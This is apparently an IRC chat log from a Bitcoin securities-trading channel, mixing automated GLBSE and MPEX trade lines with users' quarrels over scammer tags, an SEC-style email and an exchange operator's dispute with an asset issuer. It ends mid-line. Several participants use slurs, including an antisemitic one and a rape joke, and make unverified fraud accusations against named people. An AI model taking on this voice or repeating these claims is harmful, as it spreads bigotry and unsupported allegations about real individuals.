16:32:59 well, i heard people DID show up but it was the expected circle-jerk Sep 25 16:33:04 ^^ Sep 25 16:33:06 yeah what MrTiggr said Sep 25 16:33:07 lol k. Sep 25 16:33:17 but to be absolutely fair Sep 25 16:33:21 its a bitcoin conf in london Sep 25 16:33:25 lol Sep 25 16:33:30 ^^ what Diablo-D3 sed Sep 25 16:33:50 sudda held it at the ecuadorian embassy Sep 25 16:34:09 ahahaha Sep 25 16:34:17 lol Sep 25 16:34:29 or just an internationally acceptable air hub Sep 25 16:34:35 like NYC or something Sep 25 16:34:37 MrTiggr wanted to ask, did any of the police troop get sec emails ? Sep 25 16:34:49 no one in the US ever wants to go into the UK, they're anti-everybody Sep 25 16:35:17 they'll arrest you if you're black or muslim and lock you up in a metal box in freezing weather for 8 hours Sep 25 16:35:23 and they'll taser you if you have a camera Sep 25 16:35:52 heh Sep 25 16:36:32 MrTiggr wanted to ask, did any of the police troop get sec emails ? < http://pastebin.com/3ZXYMmwr did you or anyone in bitcoin police get an email like that Sep 25 16:37:16 the SEC email? I didnt get one Sep 25 16:37:21 ooh Sep 25 16:37:27 i did - went to spam Sep 25 16:37:28 :D Sep 25 16:37:30 lol Sep 25 16:37:40 its worded like a typical nigerian scam Sep 25 16:37:41 were you a pirate investor / part of gpumax ? Sep 25 16:37:59 nop but i was .. in the crowd "watching" Sep 25 16:38:07 my name would have googled its way in there for sure Sep 25 16:38:29 i love(d) to troll MNW Sep 25 16:38:34 ;) Sep 25 16:41:17 hm. Sep 25 16:41:36 some speculate the email source is pirate. i am not persuaded. Sep 25 16:41:44 mircea_popescu: well Sep 25 16:41:46 mircea_popescu: did YOU get a copy Sep 25 16:41:54 if the phone number in the email is listed on the sec.gov website Sep 25 16:41:58 and you call it Sep 25 16:41:59 and ask the guy Sep 25 16:42:03 and he says he sent the email Sep 25 16:42:13 that speculation is _not_ mutually exclusive. Sep 25 16:42:15 Diablo-D3 already happened, yes. Sep 25 16:42:16 mircea_popescu: if you have an original with mail headers, id love to see it Sep 25 16:42:23 pirate COULD be working at the SEC. Sep 25 16:42:24 MrTiggr ill pm Sep 25 16:42:28 ty Sep 25 16:44:01 [GLBSE] [FDBF] 13 @ 0.15 = 1.95 BTC [+] Sep 25 16:50:25 usagi: hah, you went the opposite direction I did Sep 25 16:54:01 [MPEX] [S.MPOE] 16900 @ 0.00035409 = 5.9841 BTC [-] Sep 25 16:58:01 nein. Sep 25 17:03:32 [GLBSE] [OBSI.HRPT] 4 @ 0.034 = 0.136 BTC [-] Sep 25 17:08:14 You guys are clearly in love. <- lolol Sep 25 17:12:17 I bought 125 NYAN.C@1, now they're at 0.09..... where's the difference to DMC?? :-) Sep 25 17:12:34 [GLBSE] [GIGAMINING] 1 @ 0.65183989 BTC [+] Sep 25 17:12:51 agath_at_work that they're both listed on global scam exchange ? Sep 25 17:13:09 that's not a difference :-) Sep 25 17:13:19 it's a similarity =) Sep 25 17:13:33 o right. sorry, my bad. Sep 25 17:13:37 wasn't it a rhetorical question, meaning there is no diff? =) Sep 25 17:18:13 [GLBSE] [PAJKA.BOND] 1 @ 0.0824 BTC [+] Sep 25 17:20:05 [MPEX] [O.BTCUSD.P200T] 1 @ 0.69468865 BTC [-] Sep 25 17:20:06 [MPEX] [O.BTCUSD.P200T] 1 @ 0.66533326 BTC [-] Sep 25 17:20:14 [GLBSE] [PAJKA.BOND] 1 @ 0.0824 BTC [+] Sep 25 17:21:13 [MPEX] [O.BTCUSD.P200T] 712 @ 0.6617303 = 471.152 BTC [-] Sep 25 17:30:28 [GLBSE] [GMVT-BOT] 7 @ 0.09 = 0.63 BTC [-] Sep 25 17:32:08 [GLBSE] [BTC-MINING] 1 @ 0.8105 BTC [-] Sep 25 17:32:09 [GLBSE] [BTC-MINING] 1 @ 0.81025 BTC [-] Sep 25 17:32:10 [GLBSE] [BTC-MINING] 3 @ 0.8102 = 2.4306 BTC [-] Sep 25 17:34:37 whoa Sep 25 17:34:51 guess ppl don't want to be on glbse anymore Sep 25 17:35:02 no Sep 25 17:35:08 it's been selling off like that since yest. Sep 25 17:35:39 I have a few shares of SS left Sep 25 17:35:57 [GLBSE] [NYAN.C] 1 @ 0.09 BTC [-] Sep 25 17:36:51 [GLBSE] [DI.BFLSC.FAIL] 200 @ 0.001 = 0.2 BTC [+] Sep 25 17:38:37 [GLBSE] [OBSI.HRPT] 2 @ 0.02309 = 0.0462 BTC [-] Sep 25 17:38:54 [GLBSE] [ASICMINER] 1 @ 0.1179 BTC [+] Sep 25 17:39:10 [GLBSE] [CPA] 1 @ 0.0302 BTC [+] Sep 25 17:39:22 lol Sep 25 17:40:21 [GLBSE] [SS] 15 @ 0.01511 = 0.2267 BTC [-] Sep 25 17:40:22 [GLBSE] [SS] 10 @ 0.0151 = 0.151 BTC [-] Sep 25 17:40:24 [GLBSE] [SS] 1 @ 0.0144 BTC [-] Sep 25 17:42:33 [GLBSE] [GSDPT] 330 @ 0.0033 = 1.089 BTC [+] Sep 25 17:46:35 usagi: you're clearly on more drugs than diablo. - A scammer tag? Because you thought you bought his silence. I'm sure that's not something EskimoBob would even (be able to) sell...lolz... Sep 25 17:47:03 [GLBSE] [BFLS.RIG] 5 @ 0.75 = 3.75 BTC [+] Sep 25 17:48:47 [GLBSE] [GSDPT] 52 @ 0.0033 = 0.1716 BTC [+] Sep 25 17:48:57 And you solidify your reputation even further with this one usagi - keep it up, you should be done by next week at this rate Sep 25 17:49:03 lol https://dl.dropbox.com/u/28686048/trust-glbse.jpg Sep 25 17:49:04 what is the breach Sep 25 17:49:04 [MPEX] [S.MPOE] 22965 @ 0.00035409 = 8.1317 BTC [-] Sep 25 17:49:05 [MPEX] [S.MPOE] 34735 @ 0.00035392 = 12.2934 BTC [-] Sep 25 17:49:08 o o, what's he up to now ? Sep 25 17:49:10 you didn;t indetfied the breach Sep 25 17:49:44 eskimobob didnt breach anything Sep 25 17:49:58 what did he breach Sep 25 17:50:09 [GLBSE] [MMM] 1 @ 0.78 BTC [-] Sep 25 17:50:17 which portion of the conctract Sep 25 17:50:26 which item specifically Sep 25 17:50:33 no it wasnt Sep 25 17:50:46 just a bunch of text walls were posteed Sep 25 17:51:12 maged would laugh Sep 25 17:51:34 I don't give a fuck what they think - I'll still think you're an idiot - and I sure as fuck wouldn't sign any agreements with you...I don't trust you any more than I trust...say....The federal Reserve Board Sep 25 17:51:41 [MPEX] [F.GIGA.ETF] 6486 @ 0.00027952 = 1.813 BTC [+] Sep 25 17:51:45 [MPEX] [F.GIGA.ETF] 1000 @ 0.0002964 = 0.2964 BTC [+] Sep 25 17:51:46 [MPEX] [F.GIGA.ETF] 8000 @ 0.00031685 = 2.5348 BTC [+] Sep 25 17:51:47 you know that you cannot force anyone to shut up Sep 25 17:52:05 you couldn't possibly justify anything to me with your typical logic usagi Sep 25 17:52:09 that's the breach of the constiution Sep 25 17:52:11 it wouldn't work Sep 25 17:52:23 you have no logical sense to your arguments Sep 25 17:52:23 nope Sep 25 17:52:36 you cannot give away your rights by signing a contract Sep 25 17:52:42 it;s called an illegal contract Sep 25 17:52:57 no penalties Sep 25 17:53:14 !ticker gigamining Sep 25 17:53:15 go sue Sep 25 17:53:20 [GLBSE:GIGAMINING] [Bid: 0.65183989] [Ask: 0.6518399] [Spread: 0.00000001] [Last: 0.65183989] [24hVol: 323.40891693] [7dAvg: 0.65036226] Sep 25 17:53:27 otherwise i have first ammendment Sep 25 17:53:30 you're just retaliating for EskimoBob calling you out for the ticking timebomb that you are usagi Sep 25 17:53:39 and that's all there is too it Sep 25 17:53:43 lol Sep 25 17:54:04 [MPEX] [F.GIGA.ETF] 80000 @ 0.0005 = 40 BTC [+] Sep 25 17:54:15 please. i have so many fucking apples here it's ridiculous. Sep 25 17:54:18 is this still about all that scammy shit with "can't say bad things about me cause i paid him 5 btc" ? Sep 25 17:54:20 I want a cookie Sep 25 17:54:31 holy shit Sep 25 17:54:38 [MPEX] [S.MPOE] 29500 @ 0.00035509 = 10.4752 BTC [+] Sep 25 17:54:40 [MPEX] [S.MPOE] 43914 @ 0.00035696 = 15.6755 BTC [+] Sep 25 17:54:41 [MPEX] [S.MPOE] 18700 @ 0.00035843 = 6.7026 BTC [+] Sep 25 17:54:42 [MPEX] [S.MPOE] 10720 @ 0.00035951 = 3.8539 BTC [+] Sep 25 17:54:44 people who pay for other people to shut up are scammy fucks in my book Sep 25 17:54:44 [MPEX] [S.MPOE] 27400 @ 0.00036114 = 9.8952 BTC [+] Sep 25 17:54:45 [MPEX] [S.MPOE] 50600 @ 0.00036444 = 18.4407 BTC [+] Sep 25 17:54:46 [MPEX] [S.MPOE] 38400 @ 0.00036498 = 14.0152 BTC [+] Sep 25 17:54:46 somebody bought F.GIGA for .0005 Sep 25 17:54:47 [MPEX] [S.MPOE] 20900 @ 0.00036576 = 7.6444 BTC [+] Sep 25 17:55:01 [MPEX] [F.GIGA.ETF] 50000 @ 0.000495 = 24.75 BTC [-] Sep 25 17:55:11 where were those buyers when I was sellllllling Sep 25 17:55:26 [MPEX] [F.GIGA.ETF] 9500 @ 0.000495 = 4.7025 BTC [-] Sep 25 17:55:37 lol nobody can time teh markets. Sep 25 17:56:21 besides, did you sell mpoe below 36 ?! Sep 25 17:56:54 no I just bought it all though Sep 25 17:56:57 S.MPOE Sep 25 17:57:23 yeah. Sep 25 17:57:38 see what they did to ma share! Sep 25 17:57:43 usagi - you seriously didn't think anyone thought the opposite, did you? I don't think it will damage my credibility to the point you have done to your own Sep 25 17:59:08 you've got every right to any opinion Sep 25 17:59:14 that doesn't make you correct though Sep 25 18:00:42 hah. OK. well...you and diablo and nefario get on with your cluster fucked circle jerk while the men go make some money...have fun with your creative accounting practive Sep 25 18:00:51 you'll have a scammer tag soon enough usagi Sep 25 18:02:23 usagi: true...you could just disappear before you get it Sep 25 18:04:13 market drop is from SEC Sep 25 18:04:20 ugh ...I would never have owned BMF or that NYAN crap, thanks. And I did flip some cpa once...when it was worth something Sep 25 18:05:01 yes - it's all to your benefit that investors are pulling out of GLBSE Sep 25 18:05:21 Bugpowder possibly. Sep 25 18:05:50 yum Sep 25 18:05:55 I'm not sure where the lulz are better - forums or #bitcoin-assets Sep 25 18:06:04 here guruvan- Sep 25 18:06:10 definitely here Sep 25 18:06:11 k. Sep 25 18:06:24 I will try to spend more time here then Sep 25 18:06:37 [GLBSE] [OBSI.HRPT] 4 @ 0.02309 = 0.0924 BTC [-] Sep 25 18:06:39 [GLBSE] [OBSI.HRPT] 10 @ 0.0230776 = 0.2308 BTC [-] Sep 25 18:06:59 well, except for OBSI Sep 25 18:07:08 outch Sep 25 18:07:34 buy the dip! Sep 25 18:07:43 oh - no I'm sure OBSI investors would be worried about sec investigations Sep 25 18:07:47 I put my tip in, then pulled out Sep 25 18:08:21 that's all it takes to lose confidence in a ponzi Sep 25 18:08:26 no surprise - someone decided they don't want him to sell more bonds... Sep 25 18:08:42 is it going back to normal payout after? Sep 25 18:09:05 it was explained in the thread Lucidize Sep 25 18:09:13 Yeah, but I didn't get it lol Sep 25 18:09:24 ;;later tell btc-mining https://bitcointalk.org/index.php?topic=112402.msg1217684#msg1217684 that's pretty clever actually. Sep 25 18:09:24 The operation succeeded. Sep 25 18:09:26 oh right, it;s that simple Sep 25 18:09:28 :D Sep 25 18:09:29 then you should not be investing in it Sep 25 18:09:33 true Sep 25 18:09:52 I don't pretend to be a genius tho Sep 25 18:12:52 [GLBSE] [GIGAMINING] 3 @ 0.65183989 = 1.9555 BTC [+] Sep 25 18:19:07 Whats new? Sep 25 18:23:06 I have to lol that anyone thinks a scammer tag has any value Sep 25 18:23:19 usagi i saw both of you acting rather unprofessional towards each other Sep 25 18:23:26 please don't bring me into this Sep 25 18:23:38 that seems pretty likely gigavps Sep 25 18:24:09 i'm not here to be unprofessional, i'm hear to make a living Sep 25 18:25:24 [MPEX] [S.MPOE] 21400 @ 0.00038969 = 8.3394 BTC [+] Sep 25 18:26:09 btw, i have the logs of that shit happening, what that shit was - im not here to here to judge. Sep 25 18:30:41 talking shit cant give anyone a scammer tag, usagi Sep 25 18:31:20 so even if eskimobob buttraped you he will not get a scammer tag Sep 25 18:31:38 I am not mad I am insane ;) Sep 25 18:31:40 lol Sep 25 18:31:58 just joking but eskimobob wont get a tag Sep 25 18:32:13 [GLBSE] [PUREMINING] 2 @ 0.09558 = 0.1912 BTC [+] Sep 25 18:32:23 unless you tell us what we dont know ;) Sep 25 18:33:12 I got a pink one Sep 25 18:33:24 mines purple Sep 25 18:33:39 wait, what are we talking about again Sep 25 18:33:43 lol Sep 25 18:34:08 #bitcoin-bitchfights Sep 25 18:34:47 that will come usagi Sep 25 18:35:14 oh lolz Sep 25 18:35:41 aw...c'mon EskimoBob Sep 25 18:36:01 I'd love to see more scammy bullshit today Sep 25 18:36:56 hehe kakobrekla Sep 25 18:37:10 SPAM Sep 25 18:37:12 SPAM Sep 25 18:37:13 SPAM Sep 25 18:37:37 I've been at this bitcoin thing a while now...I'm a junkie for scams kakobrekla Sep 25 18:37:46 :) Sep 25 18:38:14 which they probably are Sep 25 18:38:15 sounds like you Sep 25 18:38:56 oh - listen for it Sep 25 18:39:26 hmmmn didnt know this usagi Sep 25 18:39:38 damn this shit is tricky Sep 25 18:40:12 sure...... and pig fly, ooh they do lookl! Sep 25 18:40:32 damn this is better than the morning show Sep 25 18:41:13 who is whos sockpuppet usagi? Sep 25 18:41:38 ok this is going to be great fun :D Sep 25 18:42:11 1 of you is a pile of shit, but who? usagi or the chilling eskimobob ;) Sep 25 18:42:16 would anyone like a spade? Sep 25 18:42:24 [GLBSE] [FUTUREFUND] 1 @ 0.00010006 BTC [-] Sep 25 18:43:30 [GLBSE] [ASICMINER] 72 @ 0.1179 = 8.4888 BTC [+] Sep 25 18:43:59 [GLBSE] [ASICMINER] 32 @ 0.118 = 3.776 BTC [+] Sep 25 18:44:28 LOGS, LOGS, we wanna see logs :D Sep 25 18:44:45 aftyer logs usagi, first logs ! Sep 25 18:44:50 [GLBSE] [ASICMINER] 59 @ 0.119899 = 7.074 BTC [+] Sep 25 18:45:32 usagi you keep saying you are not a man! Sep 25 18:45:43 we all know better Sep 25 18:46:36 [GLBSE] [ASICMINER] 45 @ 0.1199 = 5.3955 BTC [+] Sep 25 18:46:56 PsychoticBoy usagi is a ridiculous poser. eskimo is just not "nice". Sep 25 18:47:12 yo face Sep 25 18:47:21 [GLBSE] [ASICMINER] 1 @ 0.1199 BTC [+] Sep 25 18:47:32 amazing how this channel has devolved into a bunch of people calling each other names Sep 25 18:47:46 I tthink its rather fun Sep 25 18:47:52 copumpkin, it shall pass. Sep 25 18:48:01 kakobrekla: hah, I think it'll escalate Sep 25 18:48:08 i doubt it shall. pretty much all that's left out of western culture is callingthings names Sep 25 18:48:25 like, let's call unemployment something else. Sep 25 18:49:29 where r u from Usagi? Sep 25 18:51:44 trolololololo Sep 25 18:52:43 [MPEX] [S.MPOE] 53000 @ 0.00038898 = 20.6159 BTC [-] Sep 25 18:52:45 [MPEX] [S.MPOE] 3200 @ 0.00038812 = 1.242 BTC [-] Sep 25 18:52:48 usagi, where are you from? Sep 25 18:55:09 [GLBSE] [NYAN.A] 2 @ 0.92 = 1.84 BTC [-] Sep 25 18:55:11 [GLBSE] [NYAN.A] 12 @ 0.91 = 10.92 BTC [-] Sep 25 18:55:12 [GLBSE] [NYAN.A] 1 @ 0.9012 BTC [-] Sep 25 18:55:13 [GLBSE] [NYAN.A] 3 @ 0.901 = 2.703 BTC [-] Sep 25 18:59:42 [GLBSE] [CPA] 4 @ 0.0302 = 0.1208 BTC [+] Sep 25 18:59:43 [GLBSE] [CPA] 15 @ 0.0301 = 0.4515 BTC [-] Sep 25 18:59:45 [GLBSE] [CPA] 31 @ 0.03 = 0.93 BTC [-] Sep 25 19:00:17 [MPEX] [B.MPCD.A] 19000 @ 0.0010181 = 19.3439 BTC [+] Sep 25 19:00:40 !ticker cpa Sep 25 19:00:43 [GLBSE:CPA] [Bid: 0.03] [Ask: 0.03499999] [Spread: 0.00499999] [Last: 0.03] [24hVol: 2.042644] [7dAvg: 0.044268] Sep 25 19:23:38 [GLBSE] [DMC] 1 @ 0.04999998 BTC [+] Sep 25 19:25:01 [GLBSE] [DMC] 1 @ 0.015 BTC [-] Sep 25 19:27:52 [GLBSE] [FPGAMINING] 1 @ 0.37679986 BTC [+] Sep 25 19:29:04 [MPEX] [S.MPOE] 59600 @ 0.00038812 = 23.132 BTC [-] Sep 25 19:29:06 [MPEX] [S.MPOE] 800 @ 0.00038727 = 0.3098 BTC [-] Sep 25 19:30:52 [GLBSE] [OBSI.HRPT] 10 @ 0.03399999 = 0.34 BTC [+] Sep 25 19:31:38 o look, 33 Sep 25 19:31:44 !pl obsi.hrpt .1 Sep 25 19:31:45 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 25 19:31:54 OBSI.HRPT [1@0.1BTC] paid: 0.068445 BTC. Last price: 0.03399999 BTC. Capital gain: -0.06600001 BTC. Total: 0.00244499 BTC. (2.4%) Sep 25 19:46:23 copumpkin: well the channel founder said that's what he wanted.. is it a surprise that's what it became? Sep 25 19:49:28 i'd take assets over otc any day. Sep 25 19:51:54 [GLBSE] [OBSI.HRPT] 100 @ 0.034 = 3.4 BTC [+] Sep 25 19:52:12 what Sep 25 19:52:18 i dont _want_ anything specific Sep 25 19:53:36 kakobrekla wants chaos Sep 25 19:53:37 he's like the joker Sep 25 19:59:46 [GLBSE] [BITBOND] 1 @ 0.33510001 BTC [+] Sep 25 19:59:52 [GLBSE] [BITBOND] 7 @ 0.3351 = 2.3457 BTC [-] Sep 25 20:00:58 [GLBSE] [ZETA-MINING] 3 @ 0.1525121 = 0.4575 BTC [-] Sep 25 20:01:00 [GLBSE] [ZETA-MINING] 1 @ 0.15251209 BTC [-] Sep 25 20:01:01 [GLBSE] [ZETA-MINING] 4 @ 0.15231 = 0.6092 BTC [-] Sep 25 20:01:02 [GLBSE] [ZETA-MINING] 26 @ 0.1523 = 3.9598 BTC [-] Sep 25 20:01:04 [GLBSE] [ZETA-MINING] 16 @ 0.1522 = 2.4352 BTC [-] Sep 25 20:01:33 [MPEX] [S.MPOE] 19000 @ 0.00038845 = 7.3806 BTC [+] Sep 25 20:01:34 [MPEX] [S.MPOE] 20100 @ 0.00038969 = 7.8328 BTC [+] Sep 25 20:02:55 I can escrow for you, usagi Sep 25 20:03:03 [GLBSE] [FPGAMINING] 2 @ 0.37679987 = 0.7536 BTC [+] Sep 25 20:03:04 [GLBSE] [FPGAMINING] 11 @ 0.37699994 = 4.147 BTC [+] Sep 25 20:03:05 [GLBSE] [FPGAMINING] 9 @ 0.37699995 = 3.393 BTC [+] Sep 25 20:03:06 [GLBSE] [FPGAMINING] 8 @ 0.37699996 = 3.016 BTC [+] Sep 25 20:03:47 ok Sep 25 20:04:59 [GLBSE] [GIGAMINING] 1 @ 0.58001101 BTC [-] Sep 25 20:05:01 [GLBSE] [GIGAMINING] 1 @ 0.580011 BTC [-] Sep 25 20:05:02 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Sep 25 20:05:02 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 25 20:05:03 [GLBSE] [GIGAMINING] 1 @ 0.568 BTC [-] Sep 25 20:05:05 [GLBSE] [GIGAMINING] 16 @ 0.567 = 9.072 BTC [-] Sep 25 20:06:52 [GLBSE] [ASICMINER] 1 @ 0.118 BTC [-] Sep 25 20:10:54 [GLBSE] [BTC-MINING] 2 @ 0.95975 = 1.9195 BTC [+] Sep 25 20:12:30 [GLBSE] [BAKEWELL] 1 @ 0.148999 BTC [+] Sep 25 20:12:36 I know what: I'm gonna start a new exchange with millions of dollars in backing and loads of publicity, and I'm gonna publicly call myself analbuttwhore Sep 25 20:12:49 it'll totally legitimize bitcoin securities trading Sep 25 20:13:43 when the layperson reads about my well funded exchange on the news, and hears that analbuttwhore is running it Sep 25 20:13:44 [GLBSE] [BTC-MINING] 1 @ 0.9598 BTC [+] Sep 25 20:13:46 [GLBSE] [BTC-MINING] 2 @ 0.9598 = 1.9196 BTC [+] Sep 25 20:13:51 he'll totally deposit millions into it and trade Sep 25 20:14:09 "I've spoken to cryptostocks, asking about enabling a method for assets to move from GLBSE easily to there, he had no interest." Sep 25 20:14:18 lmao Sep 25 20:14:26 not even cryptostox wants it huh. Sep 25 20:14:55 mircea_popescu: you think my plan will work? Sep 25 20:15:12 possibly not Sep 25 20:15:14 the name's too long. Sep 25 20:15:18 oh okay Sep 25 20:15:28 how about butfux Sep 25 20:15:57 that's too ethnic Sep 25 20:15:59 lol Sep 25 20:16:18 [GLBSE] [BITBOND] 2 @ 0.33510001 = 0.6702 BTC [+] Sep 25 20:16:22 You can try badcrook Sep 25 20:16:33 That could work Sep 25 20:16:34 scammarkets Sep 25 20:16:39 double e Sep 25 20:16:43 "New Bitcoin exchange to open, funded by billionaire Warren Buffett, founded and administered by Bitcoin veteran butfux. Low trading fees for the first month for people depositing over $500,000" Sep 25 20:16:44 like french. scammarkeets Sep 25 20:17:00 stop the press Sep 25 20:17:06 copumpkin : change it to buftux and you'll take over mtgox. Sep 25 20:17:13 OMG Sep 25 20:17:18 [GLBSE] [BLUECHIP] 1 @ 0.1 BTC [+] Sep 25 20:17:28 :D Sep 25 20:17:32 imma start a newexchange Sep 25 20:19:16 [GLBSE] [NASTY] 1 @ 0.47 BTC [+] Sep 25 20:19:18 [GLBSE] [NASTY] 2 @ 0.4708 = 0.9416 BTC [+] Sep 25 20:19:19 [GLBSE] [NASTY] 7 @ 0.471 = 3.297 BTC [+] Sep 25 20:19:40 [GLBSE] [RAREEARTH] 1 @ 0.01 BTC [+] Sep 25 20:19:57 or glbse Sep 25 20:20:24 why is nefario talking to him then Sep 25 20:25:29 claim code? glbse has that? Sep 25 20:25:42 https://bitcointalk.org/index.php?topic=112551.msg1220087#msg1220087 for the lolz. Sep 25 20:27:09 [GLBSE] [OBSI.HRPT] 1 @ 0.03499999 BTC [+] Sep 25 20:28:05 [MPEX] [S.MPOE] 5433 @ 0.00038969 = 2.1172 BTC [+] Sep 25 20:28:07 [MPEX] [S.MPOE] 38167 @ 0.00039251 = 14.9809 BTC [+] Sep 25 20:28:45 [GLBSE] [OBSI.HRPT] 9 @ 0.035 = 0.315 BTC [+] Sep 25 20:29:02 hm this whole SEC thing and GLBSE is getting a bit scary Sep 25 20:29:16 SEC will take a while to investigate though Sep 25 20:29:23 I think the selloff is overdone Sep 25 20:29:30 a ok Sep 25 20:29:32 ALthough, I participated Sep 25 20:29:36 should be better done via api Sep 25 20:29:47 [GLBSE] [FPGAMINING] 7 @ 0.37699996 = 2.639 BTC [+] Sep 25 20:33:27 [GLBSE] [FUTUREFUND] 40 @ 0.00010005 = 0.004 BTC [-] Sep 25 20:37:56 [GLBSE] [OBSI.HRPT] 4 @ 0.035 = 0.14 BTC [+] Sep 25 20:38:12 Smoovious: no Sep 25 20:38:17 from what I understand of goat's problem Sep 25 20:38:21 nefario basically tried to jew him Sep 25 20:39:13 perfect timing for Satoshi Dice to start making money again. https://bitcointalk.org/index.php?topic=80312.320 Sep 25 20:43:20 Im not sure Sep 25 20:43:37 I think he tried to do to goat what he tried to do to dmc Sep 25 20:44:02 nefario WAS trying to force goat to change his contract Sep 25 20:48:19 [GLBSE] [ASICMINER] 1 @ 0.1195 BTC [+] Sep 25 20:54:04 [MPEX] [F.GIGA.ETF] 2900 @ 0.00050724 = 1.471 BTC [+] Sep 25 20:55:14 things are funny, goat own a mining company which has no hardware lmfao he pays 1mh/s its a loan not a mining bond. In EU that would be called fraud, stinking goat Sep 25 20:55:32 beh Sep 25 20:55:44 PsychoticBoy for the record, i was asking for pix of his farm about 6 months ago Sep 25 20:55:48 he was too busy. Sep 25 20:56:05 he is lying he does not own shit Sep 25 20:56:48 he is just a pathetic fool Sep 25 20:56:59 back Sep 25 20:57:01 well how do you know that ? Sep 25 20:57:13 What? Sep 25 20:57:14 Smoovious: goat has really shitty contracts for his assets Sep 25 20:57:27 but its what nefario signed off on, and its what shareholders agreed to Sep 25 20:57:42 yep and does not own hardware so how on earth can you possibly issue a mining bond Sep 25 20:57:42 no, they're not Sep 25 20:57:51 but you cant force goat to fix shit if he doesnt want to Sep 25 20:57:58 PsychoticBoy: he does own hardware Sep 25 20:58:01 or at least did Sep 25 20:58:17 fact is he does not now Sep 25 20:58:27 so a nother scheme asset Sep 25 20:58:36 tygrr tech and bond bah Sep 25 20:58:53 PsychoticBoy: if he was planning on shutting down the assets as part of the sunset clauses in the contracts, this is fine Sep 25 20:59:05 nefario interfered with goat, and now I think goat might also be drunk Sep 25 20:59:11 the two might be related Sep 25 20:59:12 yep just like his contract *test* Sep 25 20:59:27 nefario is just making a bad situation worse Sep 25 20:59:37 Im glad Im not a tygrr tech or bond-a shareholder Sep 25 20:59:45 thats not shit I need to deal with on top of the dmc shit Sep 25 20:59:51 Smoovious: yes Sep 25 20:59:55 and nefario basically said now or gtfo Sep 25 21:00:01 and then shoved goat out the door Sep 25 21:00:27 if goat just burns the assets now, Im not going to blame him Sep 25 21:00:32 nefario fucked goat's shareholders Sep 25 21:00:48 its basically no different than what he tried to do to DMC and failed Sep 25 21:01:10 Smoovious: nope, and now goat has no way to pay his shareholders Sep 25 21:01:24 [GLBSE] [OBSI.HRPT] 76 @ 0.035 = 2.66 BTC [+] Sep 25 21:01:36 goat doesnt need to move the asset to another exchange just to close it down Sep 25 21:01:45 as far as I can tell nefario refuses to let goat buy back shares Sep 25 21:02:13 Smoovious: I think it does. Sep 25 21:02:19 quit shilling for nefario, dude Sep 25 21:02:26 hes in deep shit enough as it is, dont help him Sep 25 21:02:35 Smoovious: yes, and goat didnt agree to that. Sep 25 21:03:05 yes, and goat doesnt have to close the assets properly either. Sep 25 21:03:15 dishonest or not, he doesnt have to do jack shit Sep 25 21:03:47 goat has already made it well known he doesnt care about getting a scammer tag Sep 25 21:04:02 as far as goat is concerned, from what Ive been able to tell, he thinks nefario is a scammer Sep 25 21:04:08 I cant disagree with his position Sep 25 21:05:13 Smoovious: do realize goat isnt from our part of the world Sep 25 21:05:37 possibly. Sep 25 21:05:47 I dont think he really is from earth Sep 25 21:05:50 I thought he was just asian Sep 25 21:05:55 theres no way hes actually human Sep 25 21:06:28 I should convince goat to open his sharecropping asset on another exchange Sep 25 21:06:34 and invest in it just to spite nefario Sep 25 21:06:48 Smoovious: yes but Sep 25 21:06:56 nefario is just acting weird Sep 25 21:07:02 hes doing shit that no real world exchange would do Sep 25 21:07:26 if NYSE or NASDAQ pulled this shit with a multimillion dollar company, this would be lawyer time Sep 25 21:07:35 not merely lawyers, but entire law firms. firms as in plural. Sep 25 21:07:59 yes, and nefario DOESNT have his shit together Sep 25 21:07:59 [GLBSE] [GSDPT] 1 @ 0.0033995 BTC [+] Sep 25 21:08:31 nefario pissed goat off, and now all of goat's shareholders pay the penalty Sep 25 21:08:59 I would have kicked goat out too, but not like that Sep 25 21:09:08 there would have been a controlled shutdown over the next 30 days or so Sep 25 21:09:23 and it would have been public and decided by our equivalent of the SEC Sep 25 21:09:39 [GLBSE] [BTCWEB] 3 @ 0.08 = 0.24 BTC [+] Sep 25 21:10:14 Yeah, letting your emotions run a business is wrong Sep 25 21:10:24 Smoovious: oh probably Sep 25 21:10:28 I mean Im not saying goat is the good guy here Sep 25 21:10:34 goat has done a lot of dumb shit Sep 25 21:10:39 but hes clearly not a business man here Sep 25 21:10:45 he never HAD standing in the community Sep 25 21:10:46 nefario did Sep 25 21:11:13 and nefario was just as dumb as goat for dragging this on and then unilaterally deciding to fuck goat's shareholders Sep 25 21:16:20 dont do paypal. Sep 25 21:16:28 its bad for your health. Sep 25 21:21:11 if you really need pp do it with someone trusted Sep 25 21:21:22 else i would suggest anything else. Sep 25 21:21:24 :> Sep 25 21:22:28 [MPEX] [S.MPOE] 32800 @ 0.00038919 = 12.7654 BTC [-] Sep 25 21:26:29 [GLBSE] [OBSI.HRPT] 1 @ 0.03549464 BTC [+] Sep 25 21:26:30 [GLBSE] [OBSI.HRPT] 1 @ 0.037 BTC [+] Sep 25 21:26:32 [GLBSE] [OBSI.HRPT] 8 @ 0.0379 = 0.3032 BTC [+] Sep 25 21:28:37 [GLBSE] [OBSI.HRPT] 23 @ 0.0379 = 0.8717 BTC [+] Sep 25 21:30:03 [GLBSE] [OBSI.HRPT] 2 @ 0.03799999 = 0.076 BTC [+] Sep 25 21:42:09 [GLBSE] [OBSI.HRPT] 2 @ 0.03799999 = 0.076 BTC [+] Sep 25 21:42:11 [GLBSE] [OBSI.HRPT] 23 @ 0.038 = 0.874 BTC [+] Sep 25 21:42:11 [GLBSE] [OBSI.HRPT] 158 @ 0.04899999 = 7.742 BTC [+] Sep 25 21:42:12 [GLBSE] [OBSI.HRPT] 100 @ 0.049 = 4.9 BTC [+] Sep 25 21:42:14 [GLBSE] [OBSI.HRPT] 124 @ 0.04999999 = 6.2 BTC [+] Sep 25 21:42:15 [GLBSE] [OBSI.HRPT] 63 @ 0.05 = 3.15 BTC [+] Sep 25 21:42:16 [GLBSE] [OBSI.HRPT] 38 @ 0.05499997 = 2.09 BTC [+] Sep 25 21:42:17 [GLBSE] [OBSI.HRPT] 10 @ 0.05499998 = 0.55 BTC [+] Sep 25 21:42:18 [GLBSE] [OBSI.HRPT] 60 @ 0.05981999 = 3.5892 BTC [+] Sep 25 21:42:19 [GLBSE] [OBSI.HRPT] 9 @ 0.05982 = 0.5384 BTC [+] Sep 25 21:42:20 [GLBSE] [OBSI.HRPT] 60 @ 0.05984999 = 3.591 BTC [+] Sep 25 21:42:21 [GLBSE] [OBSI.HRPT] 9 @ 0.05985 = 0.5387 BTC [+] Sep 25 21:42:22 [GLBSE] 